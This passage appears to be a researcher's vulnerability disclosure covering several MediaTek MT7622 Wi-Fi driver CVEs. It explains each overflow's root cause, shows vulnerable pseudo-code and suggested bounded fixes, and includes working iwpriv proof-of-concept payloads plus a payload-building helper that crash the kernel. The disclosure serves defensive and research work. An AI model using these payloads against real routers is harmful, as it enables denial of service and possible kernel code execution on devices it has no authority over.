<p>The handler code responsible for handling the <code class="language-plaintext highlighter-rouge">RT_OID_802_11R_R0KHID</code> OID is found in the function <code class="language-plaintext highlighter-rouge">RTMPAPSetInformation()</code>. The root cause of the vulnerability is improper bounds checking of the attacker-controlled <code class="language-plaintext highlighter-rouge">iwreq.u.data.length</code> value passed from userspace; rather than checking that the value does not exceed the size of the destination <code class="language-plaintext highlighter-rouge">FtR0khId</code> field and exiting early if it does, the code does the <em>opposite</em> and checks that the incoming size is not <em>less than or equal to</em> the destination field size, essentially forcing an overflow condition to occur. The overflow happens on the call to <code class="language-plaintext highlighter-rouge">copy_from_user()</code> and writes to <code class="language-plaintext highlighter-rouge">wdev.FtCfg.FtR0khId[48]</code>. This is likely the result of a typo (using <code class="language-plaintext highlighter-rouge">&lt;=</code> when <code class="language-plaintext highlighter-rouge">&gt;=</code> was intended).</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">...</span>
<span class="k">if</span> <span class="p">(</span><span class="n">wrq</span><span class="o">-&gt;</span><span class="n">u</span><span class="p">.</span><span class="n">data</span><span class="p">.</span><span class="n">length</span> <span class="o">&lt;=</span> <span class="n">FT_ROKH_ID_LEN</span><span class="p">)</span>
	<span class="c1">// error case</span>
<span class="k">else</span> <span class="p">{</span>
	<span class="n">status</span> <span class="o">=</span> <span class="n">copy_from_user</span><span class="p">(</span><span class="n">obj</span><span class="o">-&gt;</span><span class="n">ap</span><span class="p">.</span><span class="n">bssid</span><span class="p">[</span><span class="n">apidx</span><span class="p">].</span><span class="n">wdev</span><span class="p">.</span><span class="n">cfg</span><span class="p">.</span><span class="n">r0khid</span><span class="p">,</span> <span class="n">wrq</span><span class="o">-&gt;</span><span class="n">u</span><span class="p">.</span><span class="n">data</span><span class="p">.</span><span class="n">pointer</span><span class="p">,</span> <span class="n">wrq</span><span class="o">-&gt;</span><span class="n">u</span><span class="p">.</span><span class="n">data</span><span class="p">.</span><span class="n">length</span><span class="p">);</span>
	<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>
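<p>To make the inversion concrete, the two predicates below model which lengths reach the copy. This is a sketch under assumptions: <code class="language-plaintext highlighter-rouge">FT_ROKH_ID_LEN</code> is taken to be 48 based on the <code class="language-plaintext highlighter-rouge">FtR0khId[48]</code> field, the function names are hypothetical, and the “intended” version is a guess at what the check was meant to allow.</p>

```c
#include <stdbool.h>
#include <stddef.h>

#define FT_ROKH_ID_LEN 48 /* assumed from the FtR0khId[48] field */

/*
 * The check as it appears in the pseudo-code: lengths that FIT take the
 * error branch, so only lengths larger than the field reach the copy.
 */
static bool reaches_copy_as_written(size_t len)
{
    return !(len <= FT_ROKH_ID_LEN);
}

/* Assumed intent: only lengths that fit the field should reach the copy. */
static bool reaches_copy_as_intended(size_t len)
{
    return len <= FT_ROKH_ID_LEN;
}
```

<p>With the check as written, a 48-byte request is rejected while a 49-byte (or 4000-byte) request is copied, which is exactly backwards.</p>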

<h4 id="poc-1">PoC</h4>

<p><strong>PoC Source</strong>: <a href="https://github.com/mellow-hype/mediarekt-2025/blob/main/cve-2025-20632.c">PoC Link</a></p>

<p>The included PoC demonstrates the ability to corrupt the instruction pointer with an arbitrary address by chaining this bug with an info leak in the <code class="language-plaintext highlighter-rouge">iwpriv mac</code> subcommand handler.</p>

<p><img src="/assets/images/cve-2025-20632-poc.png" alt="cve-2025-20632" /></p>

<h3 id="cve-2025-20713-stack-overflow-in-set_beaconreq_proc-parsing-of-channel-report-list">CVE-2025-20713: Stack Overflow in Set_BeaconReq_Proc Parsing of channel report list</h3>

<ul>
  <li><strong>Affected Versions</strong>: MT7622 v5.0.5.4</li>
  <li><strong>Affected Devices</strong>: Netgear WAX206 (confirmed)</li>
</ul>

<p>The function <code class="language-plaintext highlighter-rouge">Set_BeaconReq_Proc()</code> in the <code class="language-plaintext highlighter-rouge">mt7622_mt_wifi</code> driver is vulnerable to a stack buffer overflow when handling the data passed in via the call to <code class="language-plaintext highlighter-rouge">ioctl()</code> which triggers the handler. Specifically, the issue is found in the code block that handles parsing of the “channel report list” command parameter field in the incoming command string. The issue occurs due to an unbounded <code class="language-plaintext highlighter-rouge">while</code> loop which uses a counter to index and write into a stack allocated buffer based on the presence of the separator character <code class="language-plaintext highlighter-rouge">#</code> in the argument field. The values written to this buffer are 1-byte numeric values parsed using <code class="language-plaintext highlighter-rouge">strtol()</code> from the attacker-controlled input.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">case</span> <span class="mi">8</span><span class="p">:</span>
	<span class="p">...</span>
	<span class="c1">// @hypr: VULNERABLE</span>
	<span class="k">while</span> <span class="p">((</span><span class="n">chan_id_str</span> <span class="o">=</span> <span class="n">strsep</span><span class="p">((</span><span class="kt">char</span> <span class="o">**</span><span class="p">)</span><span class="o">&amp;</span><span class="n">input_str</span><span class="p">,</span> <span class="s">"#"</span><span class="p">))</span> <span class="o">!=</span> <span class="nb">NULL</span><span class="p">)</span> <span class="p">{</span>
		<span class="n">chan_rep_list</span><span class="p">[</span><span class="n">chan_id</span><span class="p">]</span> <span class="o">=</span> <span class="n">strtol</span><span class="p">(</span><span class="n">chan_id_str</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">10</span><span class="p">);</span>
		<span class="n">chan_id</span><span class="o">++</span><span class="p">;</span>
	<span class="p">}</span>
<span class="p">...</span>
</code></pre></div></div>
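<p>For comparison, a bounded version of this kind of loop might look like the userspace sketch below. It is not the driver’s code or the vendor’s fix: <code class="language-plaintext highlighter-rouge">parse_chan_list()</code> is a hypothetical name, and it walks the string with <code class="language-plaintext highlighter-rouge">strtol()</code>’s end pointer instead of <code class="language-plaintext highlighter-rouge">strsep()</code> so it doesn’t modify the input.</p>

```c
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>

/*
 * Parse '#'-separated decimal values from `s` into `out`, writing at most
 * `cap` entries. Returns the number of entries stored, or -1 as soon as the
 * input contains more fields than the destination can hold.
 */
static int parse_chan_list(const char *s, uint8_t *out, size_t cap)
{
    size_t n = 0;

    while (*s != '\0') {
        char *end;
        long v = strtol(s, &end, 10);

        if (n >= cap)
            return -1; /* the bound the vulnerable loop is missing */
        out[n++] = (uint8_t)v;

        /* advance to just past the next separator, or to the terminator */
        while (*end != '\0' && *end != '#')
            end++;
        s = (*end == '#') ? end + 1 : end;
    }
    return (int)n;
}
```

<p>The only real difference from the vulnerable pattern is the <code class="language-plaintext highlighter-rouge">n &gt;= cap</code> test before each store; the number of separators in the input no longer decides how far the writes go.</p>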

<h4 id="poc-2">PoC</h4>
<p>On a system where the kernel driver is installed, run the following <code class="language-plaintext highlighter-rouge">iwpriv</code> command to issue the IOCTL for the vulnerable code path via the <code class="language-plaintext highlighter-rouge">set</code> subcommand for the <code class="language-plaintext highlighter-rouge">BcnReq</code> key value.</p>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># write in 65 (0x41), so we end up with 0x414141414141</span>
<span class="nb">export </span><span class="nv">PAYLOAD</span><span class="o">=</span><span class="si">$(</span>python3 <span class="nt">-c</span> <span class="s2">"print('#65'*400)"</span><span class="si">)</span>
iwpriv ra0 <span class="nb">set</span> <span class="s2">"BcnReq=1!50!12!FF:FF:FF:FF:FF:FF!HYPR!255!1!32+1!1#5!1!1</span><span class="nv">$PAYLOAD</span><span class="s2">"</span>
</code></pre></div></div>
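<p>If <code class="language-plaintext highlighter-rouge">python3</code> isn’t available where the payload is being built, the same string can be assembled with a few lines of C. This is just a convenience sketch; <code class="language-plaintext highlighter-rouge">build_repeated_payload()</code> is a hypothetical helper and not part of the PoC repo.</p>

```c
#include <stddef.h>
#include <string.h>

/*
 * Write `prefix` followed by `count` copies of `token` into `out` as a
 * NUL-terminated string. Returns the string length, or -1 if the result
 * (including the terminator) would not fit in `out_len` bytes.
 */
static int build_repeated_payload(char *out, size_t out_len,
                                  const char *prefix, const char *token,
                                  size_t count)
{
    size_t plen = strlen(prefix);
    size_t tlen = strlen(token);
    size_t total = plen + tlen * count;

    if (total + 1 > out_len)
        return -1;

    memcpy(out, prefix, plen);
    for (size_t i = 0; i < count; i++)
        memcpy(out + plen + i * tlen, token, tlen);
    out[total] = '\0';
    return (int)total;
}
```

<p>Calling it with the <code class="language-plaintext highlighter-rouge">BcnReq=...</code> string as the prefix, <code class="language-plaintext highlighter-rouge">"#65"</code> as the token and a count of 400 produces the same argument as the shell snippet above.</p>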

<h3 id="cve-2025-20714-stack-overflow-in-set_beaconreq_proc-parsing-of-regulatory-class-parameter">CVE-2025-20714: Stack Overflow in Set_BeaconReq_Proc Parsing of regulatory class parameter</h3>

<p><em>MediaTek assigned a CVE for this bug, but still claimed the bug was a duplicate because the overflow happens in the same function as the other two issues in this function (CVE-2025-20715, CVE-2025-20713). That’s it – that’s the only reason they used to argue it was a duplicate.</em></p>

<ul>
  <li><strong>Affected Versions</strong>: MT7622 v5.0.5.4</li>
  <li><strong>Affected Devices</strong>: Netgear WAX206 (confirmed)</li>
</ul>

<p>The function <code class="language-plaintext highlighter-rouge">Set_BeaconReq_Proc()</code> in the <code class="language-plaintext highlighter-rouge">mt7622_mt_wifi</code> driver is vulnerable to a stack buffer overflow when handling the data passed in via the call to <code class="language-plaintext highlighter-rouge">ioctl()</code> which triggers the handler. Specifically, the issue is found in the code block that handles parsing of the “regulatory class” command parameter field in the incoming command string (parameter index 7). The issue occurs due to an unbounded <code class="language-plaintext highlighter-rouge">while</code> loop which uses a counter to index and write into a buffer at <code class="language-plaintext highlighter-rouge">RRM_MLME_BCN_REQ_INFO req_struct.reg_class[16]</code> (stack allocated) based on the presence of the separator character <code class="language-plaintext highlighter-rouge">+</code> in the argument field. The values written to this buffer are 1-byte numeric values parsed using <code class="language-plaintext highlighter-rouge">os_str_tol()</code> from the attacker-controlled input.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">case</span> <span class="mi">7</span><span class="p">:</span> <span class="p">{</span> <span class="cm">/* regulatory class. */</span>
	<span class="k">while</span> <span class="p">((</span><span class="n">reg_str</span> <span class="o">=</span> <span class="n">strsep</span><span class="p">((</span><span class="kt">char</span> <span class="o">**</span><span class="p">)</span><span class="o">&amp;</span><span class="n">thisChar</span><span class="p">,</span> <span class="s">"+"</span><span class="p">))</span> <span class="o">!=</span> <span class="nb">NULL</span><span class="p">)</span> <span class="p">{</span>
		<span class="n">req_struct</span><span class="p">.</span><span class="n">reg_class</span><span class="p">[</span><span class="n">reg_class_index</span><span class="p">]</span> <span class="o">=</span> <span class="n">strtol</span><span class="p">(</span><span class="n">reg_str</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">10</span><span class="p">);</span>
		<span class="n">reg_class_index</span><span class="o">++</span><span class="p">;</span>
	<span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>
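<p>For comparison, here’s a minimal sketch of what a bounded version of this kind of loop could look like. It’s plain userspace C and not the vendor’s fix: <code class="language-plaintext highlighter-rouge">parse_reg_classes()</code> and <code class="language-plaintext highlighter-rouge">REG_CLASS_MAX</code> are hypothetical names, and a <code class="language-plaintext highlighter-rouge">strchr()</code>-based split stands in for <code class="language-plaintext highlighter-rouge">strsep()</code> to keep the example portable.</p>

```c
#include <stddef.h>
#include <stdlib.h>
#include <string.h>

#define REG_CLASS_MAX 16 /* matches reg_class[16] from the description above */

/*
 * Hypothetical helper: split `field` on '+' and store each parsed value in
 * `out`. Returns the number of entries written, or -1 if the field holds
 * more than `out_len` entries. `field` is modified in place.
 */
static int parse_reg_classes(char *field, unsigned char *out, size_t out_len)
{
	size_t idx = 0;

	while (field != NULL) {
		/* For a single delimiter this split behaves like strsep(). */
		char *next = strchr(field, '+');

		if (next != NULL)
			*next++ = '\0';
		if (idx >= out_len)
			return -1; /* reject instead of writing out of bounds */
		out[idx++] = (unsigned char)strtol(field, NULL, 10);
		field = next;
	}
	return (int)idx;
}
```

<p>The only real difference from the vulnerable loop is the index check before the write. The same check would apply to the <code class="language-plaintext highlighter-rouge">#</code>-separated request IE field covered in the next bug.</p>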

<h4 id="poc-3">PoC</h4>
<p>On a system where the kernel driver is installed, run the following commands to create the payload buffer and issue the IOCTL for the vulnerable code path via the <code class="language-plaintext highlighter-rouge">iwpriv set</code> subcommand for the <code class="language-plaintext highlighter-rouge">BcnReq</code> key value.</p>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># write in 65 (0x41), so we end up with 0x414141414141</span>
<span class="nb">export </span><span class="nv">PAYLOAD</span><span class="o">=</span><span class="si">$(</span>python3 <span class="nt">-c</span> <span class="s2">"print('+65'*400)"</span><span class="si">)</span>
iwpriv ra0 <span class="nb">set</span> <span class="s2">"BcnReq=1!50!12!FF:FF:FF:FF:FF:FF!HYPR!255!1!32</span><span class="nv">$PAYLOAD</span><span class="s2">"</span>
</code></pre></div></div>

<h3 id="cve-2025-20715-stack-overflow-in-set_beaconreq_proc-parsing-of-request-ie-parameter">CVE-2025-20715: Stack Overflow in Set_BeaconReq_Proc Parsing of request IE parameter</h3>

<ul>
  <li><strong>Affected Versions</strong>: MT7622 v5.0.5.4</li>
  <li><strong>Affected Devices</strong>: Netgear WAX206 (confirmed), others not confirmed</li>
</ul>

<p>The function <code class="language-plaintext highlighter-rouge">Set_BeaconReq_Proc()</code> in the <code class="language-plaintext highlighter-rouge">mt7622_mt_wifi</code> driver is vulnerable to a stack buffer overflow when handling the data passed in via the call to <code class="language-plaintext highlighter-rouge">ioctl()</code> which triggers the handler. Specifically, the issue is found in the code block that handles parsing of the “request_ie” command parameter field in the incoming command string (parameter index 10). The issue occurs due to an unbounded <code class="language-plaintext highlighter-rouge">while</code> loop which uses a counter to index and write into a buffer at <code class="language-plaintext highlighter-rouge">request_ie[13]</code> based on the presence of the separator character <code class="language-plaintext highlighter-rouge">#</code> in the argument field. The values written to this buffer are 1-byte numeric values parsed using <code class="language-plaintext highlighter-rouge">strtol()</code> from the attacker-controlled input.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">case</span> <span class="mi">10</span><span class="p">:</span> <span class="p">{</span>
	<span class="c1">// @hypr: VULNERABLE</span>
	<span class="k">while</span> <span class="p">((</span><span class="n">req_str</span> <span class="o">=</span> <span class="n">strsep</span><span class="p">((</span><span class="kt">char</span> <span class="o">**</span><span class="p">)</span><span class="o">&amp;</span><span class="n">input_str</span><span class="p">,</span> <span class="s">"#"</span><span class="p">))</span> <span class="o">!=</span> <span class="nb">NULL</span><span class="p">)</span> <span class="p">{</span>
		<span class="n">request_ie</span><span class="p">[</span><span class="n">request_ie_num</span><span class="p">]</span> <span class="o">=</span> <span class="n">strtol</span><span class="p">(</span><span class="n">req_str</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">10</span><span class="p">);</span>
		<span class="n">request_ie_num</span><span class="o">++</span><span class="p">;</span>
	<span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<h4 id="poc-4">PoC</h4>
<p>On a system where the kernel driver is installed, run the following commands to create a payload buffer and run <code class="language-plaintext highlighter-rouge">iwpriv</code> to issue the IOCTL for the vulnerable code path via the <code class="language-plaintext highlighter-rouge">set</code> subcommand for <code class="language-plaintext highlighter-rouge">BcnReq</code> key value.</p>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># write in 65 (0x41), so we end up with 0x414141414141</span>
<span class="nb">export </span><span class="nv">PAYLOAD</span><span class="o">=</span><span class="si">$(</span>python3 <span class="nt">-c</span> <span class="s2">"print('#65'*400)"</span><span class="si">)</span>
iwpriv ra0 <span class="nb">set</span> <span class="s2">"BcnReq=1!50!12!FF:FF:FF:FF:FF:FF!HYPR!255!1!32+1!1#5!1!1</span><span class="nv">$PAYLOAD</span><span class="s2">"</span>
</code></pre></div></div>

<h3 id="cve-2025-20717-stack-overflow-in-set_igmp_flooding_cidr_proc">CVE-2025-20717: Stack Overflow in Set_Igmp_Flooding_CIDR_Proc</h3>

<ul>
  <li><strong>Affected Versions</strong>: MT7622 v5.0.5.4</li>
  <li><strong>Affected Devices</strong>: Netgear WAX206 (confirmed)</li>
  <li><strong>Requirements</strong>: <code class="language-plaintext highlighter-rouge">IGMP_SNOOP_SUPPORT</code> flag</li>
</ul>

<p>The vulnerability occurs due to a lack of bounds checking when performing a copy operation of user-controlled data into a statically-sized buffer. This happens in the function <code class="language-plaintext highlighter-rouge">Set_Igmp_Flooding_CIDR_Proc()</code> when the contents of <code class="language-plaintext highlighter-rouge">arg</code> (which contains the argument passed as the value of <code class="language-plaintext highlighter-rouge">IgmpFloodingCIDR</code> in the <code class="language-plaintext highlighter-rouge">iwpriv</code> command) are copied to the local buffer <code class="language-plaintext highlighter-rouge">ip_addr_str[25]</code> using <code class="language-plaintext highlighter-rouge">NdisMoveMemory()</code>. The copy operation uses the length of the string in <code class="language-plaintext highlighter-rouge">arg</code> as its size argument without checking to ensure the string length does not exceed the size of the <code class="language-plaintext highlighter-rouge">ip_addr_str[]</code> buffer. Any argument of 25 or more characters results in a stack buffer overflow (at exactly 25, the terminating null byte lands one byte past the end of the buffer).</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    <span class="kt">char</span> <span class="n">ip_addr_str</span><span class="p">[</span><span class="mi">25</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span><span class="sc">'\0'</span><span class="p">};</span>
    <span class="kt">char</span> <span class="o">*</span><span class="n">addr_str_ptr</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
	<span class="p">...</span>
    <span class="k">do</span> <span class="p">{</span>
		<span class="p">...</span>
        <span class="n">addr_str_ptr</span> <span class="o">=</span> <span class="n">ip_addr_str</span><span class="p">;</span>
		<span class="c1">// @hypr: VULNERABLE</span>
        <span class="n">NdisMoveMemory</span><span class="p">(</span><span class="n">addr_str_ptr</span><span class="p">,</span> <span class="n">arg</span><span class="p">,</span> <span class="n">strlen</span><span class="p">(</span><span class="n">arg</span><span class="p">));</span>
        <span class="n">addr_str_ptr</span><span class="p">[</span><span class="n">strlen</span><span class="p">(</span><span class="n">arg</span><span class="p">)]</span> <span class="o">=</span> <span class="sc">'\0'</span><span class="p">;</span>
		<span class="p">...</span>
</code></pre></div></div>
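<p>A minimal sketch of the missing check, written as plain userspace C. <code class="language-plaintext highlighter-rouge">copy_bounded()</code> and <code class="language-plaintext highlighter-rouge">IP_ADDR_STR_LEN</code> are hypothetical names, and <code class="language-plaintext highlighter-rouge">memcpy()</code> stands in for <code class="language-plaintext highlighter-rouge">NdisMoveMemory()</code>:</p>

```c
#include <stddef.h>
#include <string.h>

#define IP_ADDR_STR_LEN 25 /* size of ip_addr_str[] in the snippet above */

/*
 * Hypothetical helper: copy `arg` into `dst` only if the string and its
 * terminating NUL both fit. Returns 0 on success, -1 if `arg` is too long.
 */
static int copy_bounded(char *dst, size_t dst_size, const char *arg)
{
	size_t len = strlen(arg);

	if (len >= dst_size)
		return -1; /* len == dst_size would put the NUL past the end */
	memcpy(dst, arg, len);
	dst[len] = '\0';
	return 0;
}
```

<p>Note the <code class="language-plaintext highlighter-rouge">&gt;=</code> in the comparison: the buffer has to hold the terminator as well as the string. The same pattern (a copy sized by <code class="language-plaintext highlighter-rouge">strlen()</code> followed by a manual terminator) shows up again in the <code class="language-plaintext highlighter-rouge">RTMPAPIoctlE2PROM()</code> bug below, just with a 16-byte destination.</p>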

<h4 id="poc-5">PoC</h4>

<p>On a system where the kernel driver is installed, run the following commands to create a payload buffer and run <code class="language-plaintext highlighter-rouge">iwpriv</code> to issue the IOCTL for the vulnerable code path via the <code class="language-plaintext highlighter-rouge">set</code> subcommand for <code class="language-plaintext highlighter-rouge">IgmpFloodingCIDR</code> key value.</p>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">export </span><span class="nv">PAYLOAD</span><span class="o">=</span><span class="si">$(</span>python3 <span class="nt">-c</span> <span class="s2">"print('A'*2000)"</span><span class="si">)</span>
iwpriv &lt;interface&gt; <span class="nb">set </span><span class="nv">IgmpFloodingCIDR</span><span class="o">=</span>0-<span class="nv">$PAYLOAD</span>
</code></pre></div></div>

<h3 id="cve-2025-20718-stack-overflow-in-rtmpapioctle2prom">CVE-2025-20718: Stack Overflow in RTMPAPIoctlE2PROM</h3>

<ul>
  <li><strong>Affected Versions</strong>: MT7622 v5.0.5.4</li>
  <li><strong>Affected Devices</strong>: Netgear WAX206 (confirmed)</li>
</ul>

<p>The function <code class="language-plaintext highlighter-rouge">RTMPAPIoctlE2PROM()</code> in the <code class="language-plaintext highlighter-rouge">mt7622_mt_wifi</code> driver is vulnerable to a stack buffer overflow when handling the data passed in via the call to <code class="language-plaintext highlighter-rouge">ioctl()</code> which triggers the handler. Specifically, the issue is found in the code that handles parsing of the value that follows the <code class="language-plaintext highlighter-rouge">=</code> character in the command string value included in the request (indicating a write operation). The issue occurs when performing a write operation (<code class="language-plaintext highlighter-rouge">NdisMoveMemory()</code>) using the length of the incoming string value as the size argument without checking whether it exceeds the size of the destination buffer. In this case, the destination buffer <code class="language-plaintext highlighter-rouge">dest[]</code> is a char buffer of 16 bytes.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>	<span class="n">value</span> <span class="o">=</span> <span class="n">strchr</span><span class="p">(</span><span class="n">this</span><span class="p">,</span> <span class="sc">'='</span><span class="p">);</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">value</span> <span class="o">!=</span> <span class="nb">NULL</span><span class="p">)</span>
		<span class="o">*</span><span class="n">value</span><span class="o">++</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
	<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">value</span> <span class="o">||</span> <span class="o">!*</span><span class="n">value</span><span class="p">)</span> <span class="p">{</span>
	<span class="p">...</span>
	<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
		<span class="c1">// @hypr: VULNERABLE (you've gotta be fucking kidding lmao)</span>
		<span class="n">NdisMoveMemory</span><span class="p">(</span><span class="o">&amp;</span><span class="n">dest</span><span class="p">,</span> <span class="n">value</span><span class="p">,</span> <span class="n">strlen</span><span class="p">(</span><span class="n">value</span><span class="p">));</span>
		<span class="n">dest</span><span class="p">[</span><span class="n">strlen</span><span class="p">(</span><span class="n">value</span><span class="p">)]</span> <span class="o">=</span> <span class="sc">'\0'</span><span class="p">;</span>
		<span class="p">...</span>
	<span class="p">}</span>
</code></pre></div></div>

<h4 id="poc-6">PoC</h4>
<p>On a system where the kernel driver is installed, run the following <code class="language-plaintext highlighter-rouge">iwpriv</code> command to issue the IOCTL for the vulnerable code path via the <code class="language-plaintext highlighter-rouge">e2p</code> subcommand.</p>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>iwpriv &lt;interface&gt; e2p <span class="nv">rrr</span><span class="o">=</span>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
</code></pre></div></div>

<h3 id="cve-2025-20731-heap-overflow-in-oid_802_11_oce_reduced_neighbor_report-handler">CVE-2025-20731: Heap Overflow in OID_802_11_OCE_REDUCED_NEIGHBOR_REPORT Handler</h3>

<p><em>This bug has been incorrectly (and deceptively, imo) marked as Medium severity but it is <strong>provably</strong> not. The proof that I submitted (showing an unprivileged user exploiting the bug) was intentionally misunderstood as meaning that an attacker would have to <strong>create</strong> an unprivileged user first in order to exploit the bug, and creating users requires privileges, therefore privileges are required…?????? I corrected them multiple times but they were unable to comprehend that creating the unprivileged user wasn’t something the attacker would need to do. Go figure.</em></p>

<ul>
  <li><strong>Affected Versions</strong>: MT7622 driver v5.0.5.4, v5.1.0.0, MT7629 v6.0.3.0, MT7915 v7.4.0.0</li>
  <li><strong>Affected Devices</strong>: Netgear WAX206 (confirmed)</li>
  <li><strong>Requirements</strong>: <code class="language-plaintext highlighter-rouge">OCE_SUPPORT</code> flag</li>
</ul>

<p>The vulnerability occurs in the function <code class="language-plaintext highlighter-rouge">RTMPAPSetInformation()</code> when handling the <code class="language-plaintext highlighter-rouge">OID_802_11_OCE_REDUCED_NEIGHBOR_REPORT (0x969)</code> OID.</p>

<p>The issue is caused by the use of the attacker-controlled value <code class="language-plaintext highlighter-rouge">nr_list_info-&gt;ValueLen</code> in the call to <code class="language-plaintext highlighter-rouge">NdisMoveMemory()</code> without performing an upper bounds check to ensure the size of the write will not overflow the destination buffer. In this case, the destination is the <code class="language-plaintext highlighter-rouge">pMBSS-&gt;nr_list_info.Value[512]</code> buffer. <code class="language-plaintext highlighter-rouge">nr_list_info-&gt;ValueLen</code> is initialized with the data read from userspace via <code class="language-plaintext highlighter-rouge">copy_from_user()</code> and is a <code class="language-plaintext highlighter-rouge">uint32</code>, which means it’s possible to provide a length value of up to <code class="language-plaintext highlighter-rouge">MAX_UINT32</code> bytes (<code class="language-plaintext highlighter-rouge">0xffffffff</code>). This will result in corruption of heap memory, as the buffer is embedded in a larger structure allocated on the heap.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">case</span> <span class="n">OID_802_11_OCE_REDUCED_NEIGHBOR_REPORT</span><span class="p">:</span> <span class="p">{</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">is_oce_rnr</span><span class="p">(</span><span class="n">wdev</span><span class="p">))</span> <span class="p">{</span>
		<span class="p">...</span>
		<span class="n">status</span> <span class="o">=</span> <span class="n">copy_from_user</span><span class="p">(</span><span class="o">&amp;</span><span class="n">nr_list_info</span><span class="p">,</span> <span class="n">wrq</span><span class="o">-&gt;</span><span class="n">u</span><span class="p">.</span><span class="n">data</span><span class="p">.</span><span class="n">pointer</span><span class="p">,</span> <span class="n">wrq</span><span class="o">-&gt;</span><span class="n">u</span><span class="p">.</span><span class="n">data</span><span class="p">.</span><span class="n">length</span><span class="p">);</span>
		<span class="n">station_obj</span> <span class="o">=</span> <span class="o">&amp;</span><span class="n">obj</span><span class="o">-&gt;</span><span class="n">cfg</span><span class="p">.</span><span class="n">mbssid</span><span class="p">[</span><span class="n">ap_idx</span><span class="p">];</span>
		<span class="c1">// @hypr: VULNERABLE - overflow from nr_list_info.ValueLen, copied in from userspace</span>
		<span class="n">NdisMoveMemory</span><span class="p">(</span><span class="n">station_obj</span><span class="o">-&gt;</span><span class="n">nr_list_info</span><span class="p">.</span><span class="n">Value</span><span class="p">,</span>
				<span class="n">nr_list_info</span><span class="p">.</span><span class="n">Value</span><span class="p">,</span> <span class="n">nr_list_info</span><span class="p">.</span><span class="n">ValueLen</span><span class="p">);</span>
		<span class="n">station_obj</span><span class="o">-&gt;</span><span class="n">nr_list_info</span><span class="p">.</span><span class="n">ValueLen</span> <span class="o">=</span> <span class="n">nr_list_info</span><span class="p">.</span><span class="n">ValueLen</span><span class="p">;</span>
		<span class="p">...</span>
	<span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Vulnerable systems must have the <code class="language-plaintext highlighter-rouge">OceReducedNeighborReport</code> driver configuration flag set to 1.</p>
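<p>The check that’s missing here is tiny. A minimal userspace sketch, assuming a simplified stand-in structure (<code class="language-plaintext highlighter-rouge">struct nr_list</code> and <code class="language-plaintext highlighter-rouge">nr_list_store()</code> are hypothetical, and the real driver layout may differ):</p>

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define NR_VALUE_MAX 512 /* size of Value[] per the description above */

/* Hypothetical stand-in for the driver's structure. */
struct nr_list {
	uint8_t  Value[NR_VALUE_MAX];
	uint32_t ValueLen;
};

/*
 * Copy a caller-supplied list into `dst`, rejecting any ValueLen larger
 * than the destination array. Returns 0 on success, -1 otherwise.
 */
static int nr_list_store(struct nr_list *dst, const struct nr_list *src)
{
	if (src->ValueLen > sizeof(dst->Value))
		return -1; /* attacker-controlled length exceeds the buffer */
	memcpy(dst->Value, src->Value, src->ValueLen);
	dst->ValueLen = src->ValueLen;
	return 0;
}
```

<p>With this in place, a request carrying <code class="language-plaintext highlighter-rouge">ValueLen = 8000</code> is refused before any bytes are written, and the stored length can never exceed the buffer it describes.</p>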

<h4 id="poc-7">PoC</h4>

<p><strong>PoC Source</strong>: <a href="https://github.com/mellow-hype/mediarekt-2025/blob/main/cve-2025-20731.c">PoC Link</a></p>

<p>Execute the PoC on the target system running a vulnerable driver to trigger a kernel crash:</p>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># trigger the vulnerability</span>
./ioctl-ocernr-heap rai0 8000
</code></pre></div></div>

<h3 id="cve-2025-20732-stack-overflow-in-oid_802_11_oce_reduced_neighbor_report-handler">CVE-2025-20732: Stack Overflow in OID_802_11_OCE_REDUCED_NEIGHBOR_REPORT Handler</h3>

<p><em>This bug has been incorrectly (and deceptively, imo) marked as Medium severity but it is <strong>provably</strong> not. The proof that I submitted (showing an unprivileged user exploiting the bug) was intentionally misunderstood as meaning that an attacker would have to <strong>create</strong> an unprivileged user first in order to exploit the bug, and creating users requires privileges, therefore privileges are required…?????? I explained myself multiple times but they were “unable” to comprehend that creating the unprivileged user wasn’t something the attacker would need to do.</em></p>

<ul>
  <li><strong>Affected Versions</strong>: MT7622 driver v5.0.5.4, v5.1.0.0, MT7629 v6.0.3.0, MT7915 v7.4.0.0</li>
  <li><strong>Affected Devices</strong>: Netgear WAX206 (confirmed)</li>
  <li><strong>Requirements</strong>: <code class="language-plaintext highlighter-rouge">OCE_SUPPORT</code> flag</li>
</ul>

